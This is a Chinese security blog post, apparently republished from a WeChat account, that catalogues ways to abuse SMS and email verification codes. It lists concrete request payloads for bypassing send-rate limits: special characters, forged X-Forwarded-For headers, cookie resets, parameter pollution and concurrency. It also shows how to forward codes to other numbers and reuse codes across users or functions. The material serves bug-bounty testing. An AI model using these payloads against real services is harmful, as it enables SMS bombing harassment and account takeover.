前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >业务安全之短信&邮箱验证码

业务安全之短信&邮箱验证码

作者头像
F12sec
发布2022-12-30 15:32:12
3.3K0
发布2022-12-30 15:32:12
举报
文章被收录于专栏:F12sec

短信&邮箱验证码轰炸

本文对目前网络上与业务安全相关的短信&邮箱验证码进行整理。

收集自:

国外BountyTips

乌云漏洞库

各大安全类媒体(论坛、公众号等)

0x01 特殊符号绕过短信&邮箱轰炸限制

Request

代码语言:javascript
复制
phone=111*****123 或 email=test@aa.com

Response

代码语言:javascript
复制
{"status":"0","message":"发送太过频繁"}

特殊符号绕过

Request

代码语言:javascript
复制
phone=111*****123 或 email=test@aa.com
代码语言:javascript
复制
%00
%0a
%a0
\n
空格
\r
86
+
-
,
.
;
#
@
0
+86
086
0086
26个英文字符
......

0x02 修改返回值绕过短信&邮箱轰炸限制

Request

代码语言:javascript
复制
phone=111*****123 或 email=test@aa.com

Response

代码语言:javascript
复制
{"status":"0","message":"发送太过频繁"}

修改返回值绕过

拦截返回包,将Response中的status值修改为1

代码语言:javascript
复制
{"status":"1","message":"发送太过频繁"}

0x03 修改IP绕过短信&邮箱轰炸限制

Request

代码语言:javascript
复制
phone=111*****123 或 email=test@aa.com

Response

代码语言:javascript
复制
{"status":"0","message":"发送太过频繁"}

修改IP绕过

推一个burp插件

代码语言:javascript
复制
burpFakeIP是一个伪造ip地址进行服务器爆破的burpsuite插件,主要用来躲避防火墙封锁
https://github.com/TheKingOfDuck/burpFakeIP

使用请看以下文章

(71条消息) 【渗透测试】---如何用burpsuite伪造IP通地塔的博客-CSDN博客burpsuite ip伪造

Request

代码语言:javascript
复制
phone=111*****123 或 email=test@aa.com
X-Forwarded-For: 36.63.19.215
X-Forwarded: 36.63.19.215
Forwarded-For: 36.63.19.215
Forwarded: 36.63.19.215
X-Requested-With: 36.63.19.215
X-Forwarded-Proto: 36.63.19.215
X-Forwarded-Host: 36.63.19.215
X-remote-IP: 36.63.19.215
X-remote-addr: 36.63.19.215
True-Client-IP: 36.63.19.215
X-Client-IP: 36.63.19.215
Client-IP: 36.63.19.215
X-Real-IP: 36.63.19.215
Ali-CDN-Real-IP: 36.63.19.215
Cdn-Src-Ip: 36.63.19.215
Cdn-Real-Ip: 36.63.19.215
CF-Connecting-IP: 36.63.19.215
X-Cluster-Client-IP: 36.63.19.215
WL-Proxy-Client-IP: 36.63.19.215
Proxy-Client-IP: 36.63.19.215
Fastly-Client-Ip: 36.63.19.215
True-Client-Ip: 36.63.19.215
X-Originating-IP: 36.63.19.215
X-Host: 36.63.19.215
X-Custom-IP-Authorization: 36.63.19.215

Response

代码语言:javascript
复制
{"status":"1","message":"发送成功"}

0x04 修改Cookie绕过短信&邮箱轰炸限制

Request

代码语言:javascript
复制
Cookie:JSESSIONID=xxxxxxxxxx
phone=111*****123 或 email=test@aa.com

Response

代码语言:javascript
复制
{"status":"0","message":"发送太过频繁"}

修改Cookie绕过

①删除cookie

Request

代码语言:javascript
复制
phone=111*****123 或 email=test@aa.com

②重新获取一个新的cookie

换个浏览器重新获取就行了

Request

代码语言:javascript
复制
Cookie:JSESSIONID=yyyyyyyyyy
phone=111*****123 或 email=test@aa.com

0x05 参数污染绕过短信&邮箱轰炸限制

Request

代码语言:javascript
复制
phone=111*****123 或 email=test@aa.com

Response

代码语言:javascript
复制
{"status":"0","message":"发送太过频繁"}

参数污染绕过

Request

代码语言:javascript
复制
phone=111*****123&phone=111*****456&phone=111*****789

可能一次性3个手机号都接收到验证码

也可以都写同一个手机号试试能不能接收到3次短信

之前看到过一个案例

还可以这样

代码语言:javascript
复制
phone=111*****123,111*****456,111*****789

将参数改为数组形式绕过短信轰炸限制

Request

代码语言:javascript
复制
phone[]=111*****123 或 email[]=test@aa.com

0x06 并发绕过短信&邮箱轰炸限制

推一个burp插件

turbo intruder

可在 burpsuite 的 BApp Store 直接安装该插件

团员成员十二的案例里有

代码语言:javascript
复制
https://www.yuque.com/shier-mfbht/qh4bgb/zcee3k

注意下数据包里要加个 req:%s

0x07 通过写脚本定时发包绕过短信&邮箱轰炸限制

Request

代码语言:javascript
复制
phone=111****1234 或 email=test@aa.com

Response

代码语言:javascript
复制
{"status":"0","message":"请60s后再发送"}

用python写个脚本加个 time.sleep(60) 每60s后发包即可

短信&邮箱验证码转发

两个案例来自团队成员十二

关于验证码的那些漏洞 · 语雀 (yuque.com)

0x01 修改请求包实现短信&邮箱验证码转发

案例一

用户绑定了手机号,正常来说是获取绑定手机号的短信,通过burp修改成其他手机号

把这个手机号改成其他手机号的

点击提交,抓包改成其他刚刚接收短信的手机号

0x02 特殊字符实现短信&邮箱验证码转发

案例二

加个逗号后面接上需要转发的手机号,因为开发可能使用数组就导致同时把验证码发给两个手机号

参数污染也可能实现转发

Request

代码语言:javascript
复制
phone=111*****123&phone=111*****456&phone=111*****789

还有数组的方式

Request

代码语言:javascript
复制
phone=111****1234 或 email=test@aa.com

修改为

代码语言:javascript
复制
phone=[111****1234,111****4567] 或 email=[test@aa.com,test@bb.com]

短信&邮箱验证码弱耦合

0x01 验证码未与请求宿主绑定

手机号1点击获取验证码,得到验证码未ZXCV。

手机号2输入验证码ZXCV,成功通过验证。

0x02 验证码未与特定功能点绑定

找回密码处获取短信验证码

然后到登陆处使用刚刚获取的短信验证码,成功通过验证。

短信&邮箱验证码回显

案例来自十二

短信&邮箱验证码DDOS

这个例子是个特例

案例如下

https://cloud.tencent.com/developer/article/1195088

https://blog.csdn.net/Adminxe/article/details/105918280

刷新验证码,若发现在请求头中有对验证码参数可控的操作,可以尝试是否能引发DDOS

短信&邮箱验证码内容可控

经典TikTok案例

https://www.freebuf.com/vuls/224963.html

乌云案例

https://wooyun.website/show.php?uid=bI5ic82NWiGyJ0N2LJqTerytFYVGC6CPj4oNOH3b

额外的补充

漏洞挖掘在于细心尝试,可能前台登陆处发送短信验证码不存在任何漏洞,但是可以尝试登陆后查看后台中是否有与发送短信&邮箱验证码相关的功能点,例如投诉、反馈、绑定、换绑、礼品兑换等等。

参考:

国外:

https://blog.deteact.com/common-flaws-of-sms-auth/

国内:

https://www.yuque.com/shier-mfbht/qh4bgb/zcee3k#NCKmS

https://xz.aliyun.com/t/7926#toc-11

https://www.anquanke.com/post/id/93878

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-10-10,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 F12sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 短信&邮箱验证码轰炸
    • 0x01 特殊符号绕过短信&邮箱轰炸限制
      • 0x02 修改返回值绕过短信&邮箱轰炸限制
        • 0x03 修改IP绕过短信&邮箱轰炸限制
          • 0x04 修改Cookie绕过短信&邮箱轰炸限制
            • 0x05 参数污染绕过短信&邮箱轰炸限制
              • 0x06 并发绕过短信&邮箱轰炸限制
                • 0x07 通过写脚本定时发包绕过短信&邮箱轰炸限制
                  • 短信&邮箱验证码转发
                    • 0x01 修改请求包实现短信&邮箱验证码转发
                    • 0x02 特殊字符实现短信&邮箱验证码转发
                  • 短信&邮箱验证码弱耦合
                    • 0x01 验证码未与请求宿主绑定
                    • 0x02 验证码未与特定功能点绑定
                  • 短信&邮箱验证码回显
                    • 短信&邮箱验证码DDOS
                      • 短信&邮箱验证码内容可控
                        • 额外的补充
                          • 参考:
                          相关产品与服务
                          验证码
                          腾讯云新一代行为验证码(Captcha),基于十道安全栅栏, 为网页、App、小程序开发者打造立体、全面的人机验证。最大程度保护注册登录、活动秒杀、点赞发帖、数据保护等各大场景下业务安全的同时,提供更精细化的用户体验。
                          领券
                          问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档